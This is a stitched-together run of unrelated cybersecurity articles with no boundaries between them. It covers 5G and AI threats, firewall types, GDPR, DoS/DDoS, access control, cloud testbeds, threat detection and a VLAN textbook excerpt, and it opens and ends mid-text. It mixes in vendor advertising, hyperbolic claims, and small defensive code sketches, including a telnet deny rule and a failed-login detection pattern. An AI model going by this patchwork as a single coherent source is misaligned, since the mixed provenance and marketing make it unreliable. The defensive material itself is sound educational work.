At the same time, 5G networks will significantly alter the cyber threat landscape. Most attacks perpetrated today are financially motivated and do not cause real, physical damage to infrastructure or locations. With 5G networks, cyber attacks might cause severe physical destruction that destabilizes a country's economy or causes wanton loss of life. Worse still, such attacks will be executed at the same quick 5G speeds, making it nearly impossible to detect and prevent them before they occur. Moreover, 5G networks will enable cyber adversaries to discover vulnerabilities and exploit them to execute attacks instantly. While this is similar to the techniques used today, the main difference is that entire enterprises, critical infrastructure such as road networks for autonomous and self-driving vehicles, and the other infrastructure needed to run a smart city will all be connected. The destruction that successful attacks could cause can only be imagined.

Some examples of such attacks are already happening today. For instance, the Department of Homeland Security remotely hacked into the systems of a Boeing 757 passenger aircraft in 2016 while the plane was parked in Atlantic City, without relying on insider help. Also, a ransomware attack targeting the City of Baltimore locked over 10,000 employees out of their workstations. These attacks may not have caused physical destruction, but that would not be the case had they locked 10,000 self-driving cars out of critical infrastructure systems: unable to communicate with one another or to access navigational systems, the cars could cause massive accidents or massive traffic congestion.

In the coming years, 5G networks will lead to the development of smart cities and infrastructure. These will produce interconnected critical systems at an entirely new scale, including automated waste and water systems, driverless vehicles depending on intelligent transport systems, and automated emergency services and workers, all interdependent on one another. As much as these 5G-enabled solutions will be highly connected, they are also likely to be highly vulnerable. During the 2017 WannaCry attack, the ransomware took several days to spread globally; over 5G networks, such malware could spread almost at the speed of light.

5G networks will revolutionize the world immensely, but they may also drive cybercrime into real-world scenarios with consequences yet to be known. The need to develop real-time detection and preventive measures, especially with the adoption of 5G networks, cannot be overstated. Artificial intelligence technologies provide crucial components required for the world to achieve global immunity and security against cyber attacks. Artificial intelligence is already being used to innovate and develop cybersecurity solutions that can operate at a pace and scale able to secure digital prosperity in the future.
AI-powered security solutions will be leveraged to achieve top-notch efficiency in detecting and responding to cyber attacks, provide real-time threat mitigation and instant situational awareness, and automate processes for risk assessment, threat detection, and mitigation. However, many reports indicate that cybercriminal communities seize and exploit artificial intelligence security solutions as soon as they are developed, posing new challenges in the race to develop working solutions to the global cyber threat landscape. Cyber actors using artificial intelligence to execute crimes might instantly bypass technical controls that industries have developed over several decades. For example, in the financial industry, criminals may soon develop intelligent malware capable of capturing and exploiting voice synthesis solutions. This would allow them to mimic the human behavior captured in biometric data and bypass the authentication procedures implemented to secure individual bank accounts.

Besides, the use of artificial intelligence for criminal activities will most likely lead to the emergence of new breeds of cyber attacks and attack cycles. Malicious actors will deploy such attacks where they will cause the highest impact, using means that industries across the board never thought possible. To mention just a few possibilities, artificially intelligent attacks might be used in biotech industries to steal or manipulate DNA codes; to destabilize unmanned vehicles; and in healthcare systems, where smart ransomware could be timed to execute when systems are most vulnerable, causing the highest impact.

Combating these emerging trends will most likely make biometrics one of the most widely used security strategies. Biometrics already play a central role in securing devices like laptops and smartphones, and in physical security, where iris and fingerprint scans protect sensitive and classified areas. Biometrics will continue to be used to develop next-generation authentication mechanisms. Adopting such measures will require acquiring enormous volumes of data about individuals and their activities: fingerprint, iris, and voice recognition will not be adequate, and biometrics will come to include other details such as body movement and walking style. This will, however, only cause cybercriminals to target new-generation biometric data. Rather than pursuing data such as personally identifiable information, contact details, social security numbers, or official names, attacks will focus on acquiring the data used in biometric security.

What Next? New Measures and Compliance Regulations

So, what is next for cybersecurity? First, it is essential to note that cybercriminals have been executing low-risk, high-reward attacks with minimal or zero attribution, which has caused organizations to depend mostly on traditional responses, as most have provided practical solutions so far. In the coming years, emerging and transformative technologies will significantly alter the cyber threat landscape. Understanding how best to secure against the expected rise of new-generation cyber attacks and threats first requires that we understand the extent to which threat landscapes and risk environments will change.
Such an urgent and critical analysis can only be accomplished through persistent research yielding evidence-backed results. The expertise of security professionals, academics, and policymakers will be integral to developing exceptional measures for curbing future cybercrime. Ultimately, new compliance regulations are necessary as the cybersecurity landscape changes. At the same time, the responsibility for complying will grow as a result of new laws and regulations as well as user demands and public opinion. Organizations will remain challenged to incorporate the new requirements into their business processes, including their communications, employees, tools, and infrastructure.

References:
- https://www.bbc.com/news/technology-46944696
- https://www.statista.com/statistics/471264/iot-number-of-connected-devices-worldwide/
- https://www.npr.org/2019/05/21/725118702/ransomware-cyberattacks-on-baltimore-put-city-services-offline?t=1561030041838
There are several types of firewalls, and one of the major challenges companies face when trying to secure their sensitive data is finding the right one.

First off, a firewall – a network firewall – is a network appliance designed to define and enforce a perimeter. Firewalls can be deployed at the connection between an organization's internal network and the public Internet, or internally within a network to perform network segmentation. A firewall sits at the perimeter of a protected network, and all traffic crossing that boundary flows through it. This gives the firewall visibility into these traffic flows and the ability to block any traffic that violates predefined access control lists (ACLs) or is otherwise deemed a potential threat to the network.

A firewall is important because it acts as the network's first line of defense. An effective firewall can identify and block a wide variety of threats, preventing them from reaching the internal network. This decreases the amount of malicious traffic that other security solutions must inspect and the number of potential threats faced by the internal network.

Pros and Cons

Firewalls can be classified in a few different ways. Three important concepts to understand when selecting a firewall solution are the difference between stateful and stateless firewalls, the various form factors in which firewalls are available, and how a next-generation firewall (NGFW) differs from traditional ones.

The oldest and simplest distinction between firewalls is whether a firewall is stateless or stateful. A stateless firewall inspects traffic on a packet-by-packet basis. The earliest firewalls were limited to checking source and destination IP addresses, ports, and other header information to determine whether a particular packet met simple access control list requirements. This enabled firewalls to block certain types of traffic from crossing the network boundary, limiting their exploitability and their ability to leak sensitive data.

Over time, firewalls grew more sophisticated. Stateful firewalls are designed to track the details of a session from its beginning to its end, which enables them to identify and block packets that don't make sense in context (such as a SYN/ACK packet sent without a corresponding SYN). The greater functionality provided by stateful firewalls means that they have completely replaced stateless ones in common usage.

Traditional firewalls (stateful or stateless) are designed to filter traffic based upon predefined rules. This includes checking packet header information and ensuring that incoming or outgoing packets logically fit into the current connection's flow. A next-generation firewall (NGFW) includes all of this functionality but also incorporates additional security features, such as application control, an intrusion prevention system (IPS), and the ability to inspect suspicious content in a sandboxed environment. This enables it to more effectively identify and block incoming attacks before they reach an organization's internal network.
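To make the stateless model concrete, here is a minimal sketch of ACL-style filtering. It is purely illustrative, with invented rule values, and is nothing like a production firewall engine:

```python
# Minimal sketch of stateless, ACL-style packet filtering.
# Each rule matches on header fields only; no connection state is kept,
# which is exactly the limitation stateful firewalls were built to fix.
from dataclasses import dataclass

@dataclass
class Packet:
    src_ip: str
    dst_ip: str
    dst_port: int
    protocol: str  # "tcp" or "udp"

# Illustrative rules: (protocol, destination port, verdict)
ACL = [
    ("tcp", 80, "allow"),   # web traffic
    ("tcp", 443, "allow"),  # TLS
    ("tcp", 23, "deny"),    # telnet
]

def filter_packet(pkt: Packet) -> str:
    for proto, port, verdict in ACL:
        if pkt.protocol == proto and pkt.dst_port == port:
            return verdict
    return "deny"  # default-deny is the safer posture

print(filter_packet(Packet("203.0.113.7", "192.0.2.10", 443, "tcp")))  # allow
```

Note that nothing here could catch the out-of-context SYN/ACK mentioned above; that requires the per-session tracking that defines a stateful firewall.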
Another way to distinguish between firewalls is based on how they are implemented. Firewalls generally fall into three categories:

#1. Hardware Firewalls: These firewalls are implemented as a physical appliance deployed in an organization's server room or data center. While they have the advantage of running on "bare metal" hardware designed specifically for them, they are also constrained by the limitations of that hardware (number of network interface cards (NICs), bandwidth limitations, etc.).

#2. Software Firewalls: Software firewalls are implemented as code on a computer. These include both the firewalls built into common operating systems and virtual appliances that contain the full functionality of a hardware firewall but are implemented as a virtual machine.

#3. Cloud Firewalls: Organizations are increasingly moving critical data and resources to the cloud, and cloud-native firewalls are designed to follow suit. These virtual appliances are specifically designed to be deployed in the cloud and may be available either as standalone virtual machines or as a Software as a Service (SaaS) offering.

Each of these firewall form factors has its advantages and disadvantages. While a hardware firewall has access to optimized hardware, its capabilities can be constrained by that hardware. A software firewall may have slightly lower performance but can be easily updated or expanded. A cloud firewall takes advantage of all the benefits of the cloud and can be deployed close to an organization's cloud-based resources.

The firewall has undergone a series of transformations as the evolution of enterprise networks and the cyber threat landscape has changed organizations' security requirements. The latest of these changes is, of course, the increased adoption of cloud computing and remote work. Cloud firewalls are a step in the right direction toward meeting enterprise cloud security needs. However, as enterprise networks continue to evolve, organizations will increasingly deploy a next-generation firewall as part of an integrated Secure Access Service Edge (SASE) solution.

In general, a next-generation firewall is always the right choice for protecting an organization's network. Beyond that, the details (such as the desired form factor) depend upon the organization's business needs and the firewall's intended deployment location. To learn more about NGFWs and what to look for when shopping for one, check out this buyer's guide. Then, to learn more about how Check Point solutions can help to secure your network, contact us and schedule a demonstration.
Everything you need to know about data security for GDPR

The European Union's General Data Protection Regulation (GDPR) represents the biggest change to the regulatory landscape of data privacy in years. GDPR aims to unify data protection across the EU and establish data privacy and protection as a fundamental right. Penalties for non-compliance may reach up to 4% of a company's worldwide turnover or €20M, and ANY organization that handles EU citizens' personal data is affected, regardless of whether or not it operates in the EU.

The regulation calls for security measures including:
- The pseudonymisation and encryption of personal data;
- The ongoing confidentiality, integrity, availability and resilience of processing systems and services;
- The ability to restore the availability of, and access to, personal data in a timely manner in the event of a physical or technical incident;
- A process for regularly testing, assessing and evaluating the effectiveness of technical and organizational measures for ensuring security.

GDPR puts the focus on ownership. Practical steps include:
- Identify your technical lead, DPO, and executive sponsor to bear responsibility for data privacy programs.
- Map data flows and relevant systems to mark the various structures, files and systems where different levels of privacy need to be maintained, including third parties and backup systems.
- Establish a robust audit trail of activity on in-scope systems, especially data access and admin activity, as well as rich logging across all protections, in order to identify potential breach activity.
- Specify the controls set on in-scope systems and define implementation projects.

Capabilities to look for include:
- Preventing sensitive data from leaving the organization and educating users on correct behavior;
- Encrypting sensitive documents and protecting data on-premise and in the cloud;
- Strong encryption ensuring only authorized users are given access to information stored on desktops, laptops, and removable media;
- Keeping your security continuously up to date with GDPR best practices;
- Visibility into security incidents and a clear audit trail.
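Pseudonymisation, the first measure named above, can be as simple as replacing direct identifiers with keyed hashes so records remain linkable for analytics without exposing identities. A minimal sketch follows; the field names and key handling are illustrative assumptions, not a recommended production design.

```python
# Minimal sketch of pseudonymisation: replace direct identifiers with a
# keyed hash (HMAC) so records stay linkable without revealing identities.
# Keeping the key separate from the data is the whole point; without that
# separation this degrades into plain hashing.
import hmac
import hashlib

SECRET_KEY = b"store-me-in-a-vault-not-in-code"  # illustrative placeholder

def pseudonymise(identifier: str) -> str:
    return hmac.new(SECRET_KEY, identifier.encode(), hashlib.sha256).hexdigest()

record = {"email": "jane@example.com", "purchase": "laptop"}
safe_record = {"subject_id": pseudonymise(record["email"]),
               "purchase": record["purchase"]}
print(safe_record)
```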
The term DoS stands for Denial of Service, a type of cyber attack in which the target, such as a website, is flooded with traffic in order to disrupt its normal operations. DoS attacks generally take one of two forms: flood attacks, which overwhelm the target with traffic, and attacks that aim to crash the targeted service.

Signs of a denial of service attack include a slow internet connection, crashing, and difficulties in using certain services. However, there can be a harmless explanation for these things as well. A website may slow down or crash when it suddenly receives more traffic than it is prepared for. For example, an online store is probably well prepared for a large number of shoppers during special sales, so an unusually high number of legitimate users is unlikely to have a negative impact on the site's performance. A denial of service attack, on the other hand, happens unexpectedly and is something the site is unlikely to anticipate.

A simple denial of service attack can also be used in online gaming to gain an unfair advantage against opponents by disrupting their internet connection. In a situation like this, one way to prevent a denial of service attack is to change your IP address.

Whereas a denial of service attack can be carried out by a single device, distributed denial of service attacks, or DDoS attacks, use multiple devices to attack their target. Because of this, DDoS attacks are able to overwhelm their targets with an even greater number of requests than a regular DoS attack.

One way that DDoS attacks are able to use multiple sources at the same time is with something known as a botnet. Simply put, botnets are networks of devices that have been hijacked to be used in a distributed denial of service attack. The devices in a botnet are infected with a piece of malware that takes over its victim. When the DDoS attack begins, the devices in the botnet all flood the attack's target with requests simultaneously. As a consequence, the targeted service, such as a website, reaches its capacity and its performance is greatly hindered.

Nowadays, all sorts of devices can be connected to the internet, including webcams, home appliances, speakers and even smart toilets. This is referred to as the Internet of Things, or IoT. Although IoT provides numerous opportunities, it poses some threats as well. When devices are connected to the internet, they are also susceptible to malware and can thus be used to carry out DDoS attacks as part of a botnet. One notable example of a botnet that exploited IoT devices is Mirai, which is responsible for one of the largest and best-known DDoS attacks, affecting many large and widely used websites such as Twitter and Netflix. The devices used in the Mirai botnet attack included routers and webcams.

Although DoS and DDoS attacks are used for much the same purpose, there are some notable differences between the two. Ordinary denial of service attacks that do not require an expansive botnet are on the rise, as the tools to pull off a DoS attack have become more accessible: with a user-friendly interface, using these tools to flood servers with traffic does not require expert-level technical skills.

We can make a general distinction between three types of DDoS attacks: volumetric, application layer and protocol attacks. Let's look at each in more detail.

A volumetric DDoS attack aims to consume as much bandwidth as possible.
The amount of traffic can be hundreds of gigabytes or even terabytes every second. The goal of such an attack is to cause congestion on the targeted service or website. However, volumetric attacks can also act as a way to hide other types of suspicious activity.

Application layer attacks (also known as layer 7 attacks) target specific points in the application layer. What makes an application layer attack different is that it is not targeted at the system as a whole but at a specific point within it.

Whereas an application layer attack takes place in the so-called 7th layer, a protocol DDoS attack targets layers 3 and 4, the target's network and transport layers. Protocol DDoS attacks are used to exhaust the resources of devices such as the target's firewall, for instance.

DDoS bots are malware just like any other. That's why private persons should also take action to defend themselves against them. F‑Secure TOTAL comes with an antivirus that keeps you safe from malware that can make your device part of a botnet. Meanwhile, F‑Secure's versatile VPN allows you to browse online safely and in private. Read more about F‑Secure TOTAL and try it for free.
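Tying the flood attacks described above back to something concrete: a crude first line of server-side detection is to watch per-source request rates over a sliding window. The sketch below is illustrative only (the window and threshold are invented values); real DDoS mitigation relies on mechanisms such as SYN cookies, upstream scrubbing, and anycast.

```python
# Minimal sketch of flood detection with a sliding-window rate counter.
# A real mitigation stack is far more involved; this only illustrates
# the "flag abnormal per-source rates" idea.
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 10
MAX_REQUESTS_PER_WINDOW = 100  # illustrative threshold, not a tuned value

recent = defaultdict(deque)  # source IP -> timestamps of recent requests

def is_flooding(src_ip: str, now=None) -> bool:
    now = time.monotonic() if now is None else now
    q = recent[src_ip]
    q.append(now)
    while q and now - q[0] > WINDOW_SECONDS:
        q.popleft()  # drop requests that fell outside the window
    return len(q) > MAX_REQUESTS_PER_WINDOW

# Simulate a burst of 200 requests from one source in two seconds:
print(any(is_flooding("198.51.100.23", now=i * 0.01) for i in range(200)))
```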
Data confidentiality, availability, controllability and integrity are the main research areas of data security technology. The theoretical basis of data confidentiality is cryptography, while availability, controllability, and integrity are important guarantees for data security; without the latter providing technical guarantees, no matter how strong the encryption algorithm is, it is difficult to ensure data security. As an important carrier of information, data plays a very important role in information security. In order to use data in a safe and controllable manner, a variety of technical means are required as guarantees. These generally include access control technology, encryption technology, data backup and recovery technology, and system restoration technology.

Organizations must determine the appropriate access control model to adopt based on the type and sensitivity of the data they're processing, says Wagner. There are four types of access control. Among them, role-based access control (RBAC) is the most common model today, and the most recent model is attribute-based access control (ABAC):

- Discretionary access control (DAC): With DAC models, the data owner decides on access. DAC is a means of assigning access rights based on rules that users specify.
- Mandatory access control (MAC): MAC was developed using a nondiscretionary model, in which people are granted access based on an information clearance. MAC is a policy in which access rights are assigned based on regulations from a central authority.
- Role-based access control (RBAC): RBAC grants access based on a user's role and implements key security principles such as "least privilege" and "separation of privilege." Thus, someone attempting to access information can only access data deemed necessary for their role.
- Attribute-based access control (ABAC): In ABAC, each resource and user is assigned a series of attributes, including the time of day, position and location, which are used to make a decision on access to a resource.

The access control strategy is a series of rules used to control and manage the access of subjects to objects, and it reflects the security requirements of information systems. The formulation and implementation of a security policy revolve around the relationship between the subject, the object, and the security control rule set, and must follow these principles:

- Least privilege: a subject is granted only the minimum rights required to perform an operation. This restricts the subject's authority to the greatest extent and avoids dangers arising from unexpected events, errors and unauthorized use.
- Least leakage: the information a subject needs to know when performing a task is minimized, and power is assigned to the subject accordingly.
- Multi-level security strategy: data flows and permissions between subjects and objects are controlled according to security levels such as top secret, secret, confidential, restricted, and unclassified. The advantage is that it prevents the spread of sensitive information.
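To make the RBAC model described above concrete, here is a minimal sketch; the roles, users and permissions are invented for illustration.

```python
# Minimal RBAC sketch: access decisions flow from role membership, so
# "least privilege" is enforced by keeping role permission sets small.
ROLE_PERMISSIONS = {
    "nurse":  {"read_patient_record"},
    "doctor": {"read_patient_record", "write_prescription"},
    "admin":  {"manage_accounts"},
}

USER_ROLES = {
    "alice": {"doctor"},
    "bob":   {"nurse"},
}

def is_allowed(user: str, permission: str) -> bool:
    return any(permission in ROLE_PERMISSIONS.get(role, set())
               for role in USER_ROLES.get(user, set()))

print(is_allowed("alice", "write_prescription"))  # True
print(is_allowed("bob", "write_prescription"))    # False: not a doctor role
```

An ABAC engine would extend the decision function with attribute checks (time of day, location, resource labels) instead of a fixed role-to-permission table.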
LIFARS' CISO as a Service is designed to address organizations' information security leadership needs. Our CISOs are highly skilled at establishing, improving, and transforming cybersecurity programs focused on maximizing business value by minimizing risks and optimizing opportunities. LIFARS' astute information risk management leaders can discern security needs, design effective solutions and programs, and deliver results while steering through challenging organizational cultures. Our more than 20 years of security, risk, and compliance leadership experience encompasses various industries and globally dispersed organizations. Below are examples of some key areas delivered via LIFARS vCISOs:
- Information Risk Management
- Cybersecurity Strategy
- Cybersecurity Governance
- Cybersecurity Operations Management
The National Science Foundation recently announced two $10 million projects to create cloud computing test beds, to be called Chameleon and CloudLab, that will help develop novel cloud architectures and new applications.

The awards complement private sector efforts to build cloud architectures that can support real-time and safety-critical applications like those used in medical devices, power grids, and transportation systems, NSF said in its announcement. They are part of the NSFCloud program, which supports research into novel cloud architectures to address emerging challenges, including real-time and high-confidence systems.

Chameleon, to be co-located at the University of Chicago and the University of Texas at Austin, will consist of 650 cloud nodes with 5 petabytes of storage. Researchers will be able to configure slices of Chameleon as custom clouds to test the efficiency and usability of different cloud architectures on a range of problems, from machine learning and adaptive operating systems to climate simulations and flood prediction.

The test bed will allow "bare-metal access," an alternative to the virtualization technologies currently used to share cloud hardware, allowing for experimentation with new virtualization technologies that could improve reliability, security and performance. Chameleon is unique for its support for heterogeneous computer architectures, including low-power processors, general processing units and field-programmable gate arrays, as well as a variety of network interconnects and storage devices, NSF said. Researchers can therefore mix and match hardware, software and networking components and test their performance. This flexibility is expected to benefit many scientific communities, including the growing field of cyber-physical systems, or the Internet of Things, which integrates computation into physical infrastructure.

"Like its namesake, the Chameleon test bed will be able to adapt itself to a wide range of experimental needs, from bare metal reconfiguration to support for ready-made clouds," said Kate Keahey, a scientist at the Computation Institute at the University of Chicago and principal investigator for Chameleon. "Furthermore, users will be able to run those experiments on a large scale, critical for big data and big compute research."

The CloudLab test bed is a large-scale distributed infrastructure based at the University of Utah, Clemson University and the University of Wisconsin, on top of which researchers will be able to construct many different types of clouds. Each site will have unique hardware, architecture and storage features, and will connect to the others via 100 gigabit/sec connections on Internet2's advanced platform. CloudLab will also support OpenFlow (an open standard that enables researchers to run experimental protocols in campus networks) and other software-defined networking technologies.

CloudLab will provide approximately 15,000 processing cores and in excess of 1 petabyte of storage across its three data centers. Each center will comprise different hardware, facilitating additional experimentation; to that end, the team is partnering with HP, Cisco and Dell to provide diverse platforms for research. Like Chameleon, CloudLab will feature bare-metal access.
Over its lifetime, CloudLab is expected to run dozens of virtual experiments simultaneously and to support thousands of researchers. "CloudLab will be a facility where researchers can build their own clouds and experiment with new ideas with complete control, visibility and scientific fidelity,” said Robert Ricci, a research assistant professor of computer science at the University of Utah and principal investigator of CloudLab. Ultimately, the goal of the NSFCloud program and the two new test beds is to advance the field of cloud computing broadly. The awards will help researchers develop new concepts, methods and technologies to enable infrastructure design and execution.
The severity and sophistication of cyber threats continue to evolve at an alarming pace, raising questions about organizations' ability to defend against distributed attacks. Enterprise networks and systems are lucrative targets for malicious actors, who steal sensitive data or hold companies ransom using malware. Currently, it takes the average business around 197 days to identify a security breach and 69 days to contain it, according to IBM's 2020 Cost of a Data Breach Report. This prolonged incident response leaves organizations vulnerable to significant financial and operational losses, along with costly unplanned downtime and diminished productivity.

To offset the risk of large-scale security breaches, companies must understand how to quickly and efficiently detect and mitigate cyber threats. But given the growing number of hacking methods and social engineering tactics, how can businesses create a genuinely useful cyber security program?

Top cyber security threats: 2020 and beyond

Cyber attack detection and mitigation strategies rely on threat intelligence: by keeping track of security trends and high-profile hacking incidents, organizations can quickly adapt to new attack vectors and enhance their IT postures. Since every industry relies on different digital technologies, business leaders need to understand how their networks and systems can be exploited. For example, the manufacturing industry is undergoing a significant transformation thanks to the industrial internet of things (IIoT) and wireless connectivity. While these advancements have helped boost productivity, they've also introduced new security concerns that can be hard to mitigate. According to the National Institute of Standards and Technology, the five most common cyber threats to manufacturers include:
- Identity theft.
- Phishing attacks.
- Spear phishing.
- Malicious spam.
- Compromised web applications and web pages.

Alongside these threats, manufacturers must also guard against ransomware, brute-force attacks, data breaches, and other complex hacking techniques that are ubiquitous across industry lines. Cyber criminals are continually looking for new opportunities to turn crises in their favor, as demonstrated by the ongoing COVID-19 pandemic. In early April 2020, the Department of Homeland Security and the Cybersecurity and Infrastructure Security Agency released a joint alert warning businesses about the growing use of "COVID-19-related themes" by malicious actors. These cyber threats include:
- Phishing attacks that use COVID-19 as a lure.
- Malware distribution through emails related to coronavirus news.
- Brute-force attacks against remote access and teleworking infrastructure.
- Infected links on newly registered domains related to COVID-19.

These findings support a recent survey from CSO Online, which found that the volume, severity, and scope of cyber attacks have increased 26% since mid-March. To stay one step ahead, organizations must understand how to detect and mitigate cyber threats, prioritize cyber security awareness, and enhance their threat intelligence activities.

Cyber attack prevention: The role of risk assessments

The first step to improving any cyber security program is to conduct a thorough risk assessment that takes all devices, data stores, networks, and systems into account. Risk assessment activities should be performed annually to ensure organizations stay abreast of both traditional and emergent cyber attack methods.
Under NIST's risk management framework, organizations should perform the following tasks:
- Categorize potential threats: By collecting information on cyber threat sources, events, and vulnerabilities, organizations can categorize different attack vectors based on their potential impact. This information can help identify high-risk threats and provides a foundation for detection and mitigation strategies.
- Select essential security controls: Using the gathered threat intelligence, organizations can select baseline security controls for their data, networks, and systems. Over time, these controls should be refined based on new threat and vulnerability information.
- Implement threat detection and mitigation tools: After establishing baseline controls, companies should implement advanced cyber security tools to protect against specific threats. These include vulnerability management software, threat detection systems, remote monitoring platforms, and more.
- Assess current IT posture: After making the above improvements, IT administrators should conduct a follow-up assessment to ensure all new security systems function as intended. The results can also help tailor incident response plans to particular threats and vulnerabilities.
- Monitor performance: Even after completing the risk assessment, companies must continue to monitor their networks and systems for new vulnerabilities and configuration flaws. This ongoing process can help key decision-makers evaluate the effectiveness of security controls, the impact of changes to IT systems, and compliance with federal legislation.

Cyber security is all about preparation and prevention. By remaining proactive, organizations can implement evidence-based security processes and stay one step ahead of malicious actors. Of course, knowing how to detect and mitigate cyber threats is also crucial, as even the most comprehensive cyber security defenses will experience an incident sooner or later.

How to detect cyber threats

Cyber threat detection requires strong internal IT policies and advanced monitoring. While some companies rely on manual processes, research from IBM found that security automation can significantly reduce the cost of breaches: the average breach cost for automation-focused companies stands at $2.88 million, while those without these tools face an estimated $4.43 million price tag.

In terms of specific threat detection tools, NIST recommends prioritizing the following:
- Anti-virus software: Installing anti-virus software capable of detecting malware, spyware, ransomware, and malicious email attachments is essential to warding off a wide range of cyber threats. These mechanisms can help safeguard sensitive data, networks, and systems from malicious code by alerting IT administrators about high-risk incidents.
- Threat detection logs: Most cyber security platforms offer advanced logging capabilities to help organizations detect suspicious activity on their networks and systems. By maintaining and reviewing these logs, security professionals can conduct detailed investigations that touch on network security and computer security simultaneously.
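As a toy illustration of log-based detection, a few lines of scripting can already surface brute-force patterns. The log format and threshold below are invented for the example; real detection stacks (SIEMs) correlate many more signals.

```python
# Minimal sketch: scan an auth log for repeated failed logins per source IP.
# This shows the core "review the logs, alert on anomalies" loop in its
# simplest form.
import re
from collections import Counter

FAILED_LOGIN = re.compile(r"Failed password for .+ from (\d+\.\d+\.\d+\.\d+)")
THRESHOLD = 5  # illustrative: alert after 5 failures from one source

def find_brute_force(log_lines):
    failures = Counter()
    for line in log_lines:
        match = FAILED_LOGIN.search(line)
        if match:
            failures[match.group(1)] += 1
    return {ip: n for ip, n in failures.items() if n >= THRESHOLD}

sample = ["Oct 2 12:00:01 sshd: Failed password for root from 203.0.113.9"] * 6
print(find_brute_force(sample))  # {'203.0.113.9': 6}
```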
Other key threat detection strategies include:
- Penetration testing: Testing allows companies to identify vulnerabilities in their systems, networks, and web applications. By stepping into the shoes of malicious actors, internal security experts can probe their IT environments for unpatched software, configuration issues, authentication errors, and more.
- Automated monitoring systems: Alongside manual processes, companies can enhance their IT posture by integrating automated threat detection systems. Asset management platforms can help organizations keep track of device performance and activity, while network security tools monitor web traffic in real time. These systems send timely alerts to the cyber security team when irregularities are detected, reducing incident response times.

How to mitigate cyber threats

When it comes to mitigating cyber threats, prevention is always the best approach. Organizations can eliminate a wide range of potential attack vectors by continuously monitoring for vulnerabilities, suspicious activity, and unauthorized access. End-user education is also crucial, especially where phishing scams and malware distribution are concerned: the more employees know about these attack methods, the less likely they are to click on an infected link or hand over their sensitive data to malicious actors.

Key cyber threat mitigation strategies include:
- Vulnerability management: Staying on top of device, network, and system vulnerabilities is essential to any organization's cyber security defenses. Hackers frequently leverage zero-day exploits, weak authentication, and untrained users to aid their illegal activities. By keeping all software and operating systems up to date, companies can prevent malicious actors from establishing a foothold inside their IT infrastructure.
- Data loss prevention: Insulating sensitive data from unauthorized users is a top concern for companies in almost every industry, especially those collecting and storing consumer information. Developing a data backup schedule and a data loss prevention system can help reduce the risk of unplanned downtime from ransomware attacks, malware, and more.

Ultimately, understanding how to detect and mitigate cyber threats is only one piece of the puzzle. Companies must also establish clear internal policies to ensure that all employees follow best practices and uphold regulatory requirements. These guidelines are essential in the manufacturing industry, as a single security breach can lead to significant financial and operational disruptions.

As a proud supporter of American manufacturing, Certitude Security® is working diligently to inform leaders and facilitate essential asset protection priorities for manufacturing businesses throughout the United States. If you are interested in learning about the empowerment services that Certitude Security® can offer, visit our website or coordinate a time to speak with a team member today.
VLANs in a Multiswitched Environment (3.1.2)

Even a small business might have more than one switch. Multiple switch configuration and design influences network performance. Trunks are commonly used to connect a switch to a switch or to another network device such as a router.

VLAN Trunks (3.1.2.1)

A VLAN trunk, or trunk, is a point-to-point link between two network devices that carries more than one VLAN. A VLAN trunk extends VLANs across two or more network devices. Cisco supports IEEE 802.1Q for coordinating trunks on Fast Ethernet, Gigabit Ethernet, and 10-Gigabit Ethernet interfaces.

VLANs would not be very useful without VLAN trunks. VLAN trunks allow all VLAN traffic to propagate between switches, so that devices which are in the same VLAN, but connected to different switches, can communicate without the intervention of a router. A VLAN trunk does not belong to a specific VLAN; rather, it is a conduit for multiple VLANs between switches and routers. A trunk could also be used between a network device and a server or other device that is equipped with an appropriate 802.1Q-capable NIC. By default, on a Cisco Catalyst switch, all VLANs are supported on a trunk port.

In Figure 3-6, the links between switches S1 and S2, and S1 and S3, are configured to transmit traffic coming from VLANs 10, 20, 30, and 99 across the network. This network could not function without VLAN trunks.

Figure 3-6 Trunks

Controlling Broadcast Domains with VLANs (3.1.2.2)

Recall that a broadcast domain includes all of the devices that receive a broadcast. When a switch is bought, removed from the packaging, and powered on, all devices attached to the switch are part of the same network or broadcast domain. When VLANs are implemented, each VLAN is its own broadcast domain. Let's examine that concept, because VLANs are commonly implemented in business.

Network Without VLANs

In normal operation, when a switch receives a broadcast frame on one of its ports, it forwards the frame out all other ports except the port where the broadcast was received. In this example, the entire network is configured in the same subnet (172.17.40.0/24) and no VLANs are configured. As a result, when the faculty computer (PC1) sends out a broadcast frame, switch S2 sends that broadcast frame out all of its ports. Eventually the entire network receives the broadcast because the network is one broadcast domain.

Network with VLANs

Now suppose the network has been segmented using two VLANs: Faculty devices are assigned to VLAN 10 and Student devices are assigned to VLAN 20. When a broadcast frame is sent from the faculty computer, PC1, to switch S2, the switch forwards that broadcast frame only to those switch ports configured to support VLAN 10.

The ports that comprise the connection between switches S2 and S1 (ports F0/1), and between S1 and S3 (ports F0/3), are trunks and have been configured to support all the VLANs in the network. When S1 receives the broadcast frame on port F0/1, S1 forwards that broadcast frame out of the only other port configured to support VLAN 10, which is port F0/3. When S3 receives the broadcast frame on port F0/3, it forwards that broadcast frame out of the only other port configured to support VLAN 10, which is port F0/11. The broadcast frame arrives at the only other computer in the network configured in VLAN 10, which is faculty computer PC4.

Figure 3-7 shows a network design without segmentation compared to how it looks with VLAN segmentation, as shown in Figure 3-8.
Notice how the network with the VLAN segmentation design has different network numbers for the two VLANs. Also notice how a trunk must be used to carry multiple VLANs across a single link. By implementing a trunk, any future VLAN or any PC related to assembly line production can be carried between the two switches.

Figure 3-7 Network without Segmentation

Figure 3-8 Networks with Segmentation

When VLANs are implemented on a switch, the transmission of unicast, multicast, and broadcast traffic from a host in a particular VLAN is restricted to the devices that are in that VLAN.

Tagging Ethernet Frames for VLAN Identification (3.1.2.3)

Layer 2 devices use the Ethernet frame header information to forward packets. The standard Ethernet frame header does not contain information about the VLAN to which the frame belongs; thus, when Ethernet frames are placed on a trunk, information about the VLANs to which they belong must be added. This process, called tagging, is accomplished by using the IEEE 802.1Q header specified in the IEEE 802.1Q standard. The 802.1Q header includes a 4-byte tag inserted within the original Ethernet frame header, specifying the VLAN to which the frame belongs, as shown in Figure 3-9.

Figure 3-9 Fields in an Ethernet 802.1Q Frame

When the switch receives a frame on a port configured in access mode and assigned a VLAN, the switch inserts a VLAN tag in the frame header, recalculates the FCS, and sends the tagged frame out of a trunk port.

VLAN Tag Field Details

The VLAN tag field consists of a Type field, a tag control information field, and the FCS field:

- Type: A 2-byte value called the tag protocol ID (TPID) value. For Ethernet, it is set to hexadecimal 0x8100.
- User priority: A 3-bit value that supports level of service implementation.
- Canonical Format Identifier (CFI): A 1-bit identifier that enables Token Ring frames to be carried across Ethernet links.
